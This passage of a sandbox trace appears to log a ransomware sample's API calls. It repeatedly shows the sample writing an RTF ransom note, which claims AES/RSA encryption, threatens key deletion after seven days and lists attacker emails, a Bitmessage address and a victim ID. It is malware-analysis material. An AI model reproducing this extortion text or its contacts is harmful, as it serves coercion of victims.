data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x245c778, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nù^=«\x16O\x1fïж>\x9bXË\x7fEóO¸Ù\x0c0\x9a\x03\x1f", lpUsedDefaultChar=0x0) returned 8717 [0281.666] WriteFile (in: hFile=0x2c8, lpBuffer=0x245c778*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x245c778*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0281.667] CloseHandle (hObject=0x2c8) returned 1 [0281.667] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fa\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fa\\#readme_eman#.rtf")) returned 0xffffffff [0281.667] GetLastError () returned 0x2 [0281.667] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fa\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fa\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c8 [0281.668] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0281.668] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 